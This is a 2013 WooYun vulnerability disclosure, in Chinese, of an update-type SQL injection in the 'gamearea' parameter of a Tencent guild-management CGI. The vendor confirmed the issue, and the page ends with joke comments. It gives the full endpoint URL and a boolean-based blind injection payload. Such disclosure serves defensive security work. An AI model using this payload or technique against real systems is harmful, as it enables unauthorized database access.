当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-024854

漏洞标题:腾讯某分站的一个updateSQL注射

相关厂商:腾讯

漏洞作者: Jannock

提交时间:2013-05-31 11:22

修复时间:2013-07-15 11:23

公开时间:2013-07-15 11:23

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-05-31: 细节已通知厂商并且等待厂商处理中
2013-05-31: 厂商已经确认,细节仅向厂商公开
2013-06-10: 细节向核心白帽子及相关领域专家公开
2013-06-20: 细节向普通白帽子公开
2013-06-30: 细节向实习白帽子公开
2013-07-15: 细节向公众公开

简要描述:

腾讯某分站SQL注射

详细说明:

http://app.gh.qq.com/
新建一个公会,
基础信息管理
入驻大区
保存操作:
http://app.gh.qq.com/cgi-bin/v1/guild/cgi_set_guild_base.cgi?iGuildID=xxxx&type=2&gamearea=327,320,&rd=0.8207729268233043
gamearea 存在SQL注入,
Update 类型
http://app.gh.qq.com/cgi-bin/v1/guild/cgi_set_guild_base.cgi?iGuildID=xxx&type=2&gamearea=327,'%2b(if((1=1),1,(select 1 from information_schema.tables)))%2b'&rd=0.8207729268233043

漏洞证明:

1.jpg


2.jpg

修复方案:

不说了

版权声明:转载请注明来源 Jannock@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2013-05-31 11:41

厂商回复:

非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-05-31 11:27 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    一楼卖萌

  2. 2013-05-31 11:30 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    二楼卖肾

  3. 2013-05-31 11:56 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    三楼卖wb

  4. 2013-05-31 11:58 | 点点 ( 普通白帽子 | Rank:214 漏洞数:38 | 准备申请سمَـَّوُوُحخ ̷̴̐...)

    四楼卖妹纸

  5. 2013-05-31 12:11 | jdnehc ( 实习白帽子 | Rank:76 漏洞数:12 )

    五楼卖萌

  6. 2013-05-31 12:16 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    六楼捐精

  7. 2013-05-31 13:08 | 钱途 ( 普通白帽子 | Rank:273 漏洞数:44 )

    @鬼魅羊羔 七楼卖羊肉。鬼魅羊羔(你懂得)

  8. 2013-05-31 13:27 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    @钱途 8楼也卖羊肉 @梦想肥羊

  9. 2013-05-31 14:23 | Rookie ( 普通白帽子 | Rank:288 漏洞数:78 | 123)

    好吧 9楼 卖精 @小胖子 你多捐点 我好拿去卖

  10. 2013-05-31 15:06 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    10楼卖血

  11. 2013-05-31 15:43 | 范特西 ( 实习白帽子 | Rank:46 漏洞数:5 | 我是菜鸟)

    11楼卖楼上所有人 @鬼魅羊羔 @蟋蟀哥哥 @VIP @点点 @jdnehc @小胖子 @钱途 @Rookie @Black Angel

  12. 2013-05-31 17:21 | 点点 ( 普通白帽子 | Rank:214 漏洞数:38 | 准备申请سمَـَّوُوُحخ ̷̴̐...)

    @范特西 我只卖11楼

  13. 2013-05-31 23:02 | Damo ( 普通白帽子 | Rank:209 漏洞数:31 | 我只是喜欢看加菲猫而已ส็็็็็็็็...)

    @点点 卖12楼

  14. 2013-06-01 11:22 | ( 路人 | Rank:14 漏洞数:4 | 小夜,一个苦逼程序员)

    哼哼!我把楼上都卖了,1楼的当老鸨,2楼的当龟公

  15. 2013-06-19 10:06 | 78基佬 ( 实习白帽子 | Rank:84 漏洞数:20 | 不会日站的设计师不是好产品经理)

    我卖一哥

  16. 2013-06-30 16:39 | 银冥币 ( 实习白帽子 | Rank:35 漏洞数:19 | "/upload/avatar/avatar_251_b.jpg" />)

    我是买家-.-

  17. 2013-06-30 17:38 | NoKing ( 路人 | Rank:15 漏洞数:2 | 一个垃圾罢了)

    我么,来收税的

  18. 2013-07-01 09:23 | luwikes ( 普通白帽子 | Rank:512 漏洞数:68 | 潜心学习~~~)

    全部没收,我是城管

  19. 2013-07-01 09:51 | Inset ( 路人 | Rank:8 漏洞数:1 | 闲来无事,到处逛逛!)

    来收保护费了!

  20. 2013-07-02 01:14 | lucass ( 路人 | Rank:2 漏洞数:3 | 小学毕业的孩纸)

    你大爷哦···哥穷的一B 什么都没得卖!!

  21. 2013-07-02 14:53 | by_奇奇 ( 实习白帽子 | Rank:35 漏洞数:7 | 2)

    全贡献给我把。

  22. 2013-07-10 09:46 | feng ( 普通白帽子 | Rank:664 漏洞数:70 | 想刷个6D)

    @Jannock 能不能猜测一下sql语句是怎么写的,也让我们这些菜鸟能够学习下